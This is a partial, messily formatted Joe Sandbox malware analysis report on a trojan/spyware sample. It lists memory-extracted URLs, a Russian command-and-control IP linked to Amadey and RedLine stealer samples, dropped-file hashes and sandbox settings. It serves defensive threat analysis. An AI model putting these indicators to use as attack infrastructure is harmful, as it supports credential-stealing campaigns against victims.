http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id6Response | dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ip.sb/ip | kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, en675431.exe.1.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/04/sc | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id9Response | dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/rm8D# | dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id20dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Entity/Id21dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Entity/Id22dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/Entity/Id1ResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequesteddvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegodvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingdvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletiondvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id10dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id11dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id12dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16ResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CanceldvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id13dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id14dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id15dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NoncedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id17dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id18dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id5ResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id19dvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsdvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id10ResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id8ResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentitydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfdvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeydvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingexdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoordvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncedvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsedvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultdvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewdvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://tempuri.org/Entity/Id17ResponsedvL76s65.exe, 0000000F.00000002.413281318.000000000503D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
193.233.20.30 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 829671
Start date and time: 2023-03-18 20:56:13 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: szDGo5lHdI.exe
Original Sample Name: d20ba0ceff50b0a05c84f694e28462aa.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/11@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 45% (good quality ratio 43.1%)
• Quality average: 85.1%
• Quality standard deviation: 23.8%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 144
• Number of non-executed functions: 164
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:59:20 | API Interceptor | 11x Sleep call for process: dvL76s65.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
193.233.20.30 | wD1HavDmzM.exe | Get hash | malicious | Amadey, RedLine | Browse |
| qRIHmQVYic.exe | Get hash | malicious | Amadey, RedLine | Browse |
| oPHmWw9Rxf.exe | Get hash | malicious | Amadey, RedLine | Browse |
| geMizFBwNi.exe | Get hash | malicious | Amadey, RedLine | Browse |
| no5jA7VYxT.exe | Get hash | malicious | Amadey, RedLine | Browse |
| WqPen4qUki.exe | Get hash | malicious | Amadey, RedLine | Browse |
| FLSlalf2jO.exe | Get hash | malicious | Amadey, RedLine | Browse |
| SxENtP53ch.exe | Get hash | malicious | Amadey, RedLine | Browse |
| lcYlJdJ0mu.exe | Get hash | malicious | Amadey, RedLine | Browse |
| setup.exe | Get hash | malicious | Amadey, RedLine | Browse |
| sr0rlSF3bv.exe | Get hash | malicious | Amadey, RedLine | Browse |
| yJiSZ5oW5P.exe | Get hash | malicious | Amadey, RedLine | Browse |
| hcZE6LYOAx.exe | Get hash | malicious | Amadey, RedLine | Browse |
| zC9xg9T7nY.exe | Get hash | malicious | Amadey, RedLine | Browse |
| tZ8P3TRdFa.exe | Get hash | malicious | Amadey, RedLine | Browse |
| uKl6zcHADR.exe | Get hash | malicious | Amadey, RedLine | Browse |
| lN81dX59sQ.exe | Get hash | malicious | Amadey, RedLine | Browse |
                                                                                                                                                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
REDCOM-ASRedcomKhabarovskRussiaRU | wD1HavDmzM.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| qRIHmQVYic.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| oPHmWw9Rxf.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| geMizFBwNi.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| no5jA7VYxT.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| WqPen4qUki.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| FLSlalf2jO.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| SxENtP53ch.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| lcYlJdJ0mu.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| setup.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| sr0rlSF3bv.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| yJiSZ5oW5P.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| hcZE6LYOAx.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| zC9xg9T7nY.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| tZ8P3TRdFa.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| uKl6zcHADR.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| lN81dX59sQ.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.30
| 58CBL06dSB.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.28
| file.exe | Get hash | malicious | Amadey, RedLine | Browse | 193.233.20.28
| 1L2HQhCPwj.exe | Get hash | malicious | RedLine | Browse | 193.233.20.28
                                                                                                                                                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe | bCHMhfe2vn.exe | Get hash | malicious | Amadey, RedLine | Browse |
| JWwmlPG6T4.exe | Get hash | malicious | Amadey, RedLine | Browse |
| lz1sDblrYC.exe | Get hash | malicious | Amadey, RedLine | Browse |
| 2OFtBU6Tvq.exe | Get hash | malicious | Amadey, RedLine | Browse |
| tb5QNVq4tA.exe | Get hash | malicious | Amadey, RedLine | Browse |
| wD1HavDmzM.exe | Get hash | malicious | Amadey, RedLine | Browse |
| d1CNSOQG6J.exe | Get hash | malicious | Amadey, RedLine | Browse |
| amXdEMvtjh.exe | Get hash | malicious | Amadey, RedLine | Browse |
| qRIHmQVYic.exe | Get hash | malicious | Amadey, RedLine | Browse |
| oPHmWw9Rxf.exe | Get hash | malicious | Amadey, RedLine | Browse |
| geMizFBwNi.exe | Get hash | malicious | Amadey, RedLine | Browse |
| setup.exe | Get hash | malicious | Amadey, RedLine | Browse |
| E8DQP4nJIj.exe | Get hash | malicious | Amadey, RedLine | Browse |
| r0cTE8cVSm.exe | Get hash | malicious | Amadey, RedLine | Browse |
| xj1TpEtv4z.exe | Get hash | malicious | Amadey, RedLine | Browse |
| FmgrIPCiXX.exe | Get hash | malicious | Amadey, RedLine | Browse |
| yTiVDw9gIM.exe | Get hash | malicious | Amadey, RedLine | Browse |
| no5jA7VYxT.exe | Get hash | malicious | Amadey, RedLine | Browse |
| WqPen4qUki.exe | Get hash | malicious | Amadey, RedLine | Browse |
| gfXRZ7m99K.exe | Get hash | malicious | Amadey, RedLine | Browse |
Process: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.354940450065058
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5: B10E37251C5B495643F331DB2EEC3394
SHA1: 25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256: 8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512: 296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
Process: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 321
Entropy (8bit): 5.355221377978991
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                                                                                                                                                                                  MD5:03C5BA5FCE7124B503EA65EF522177C3
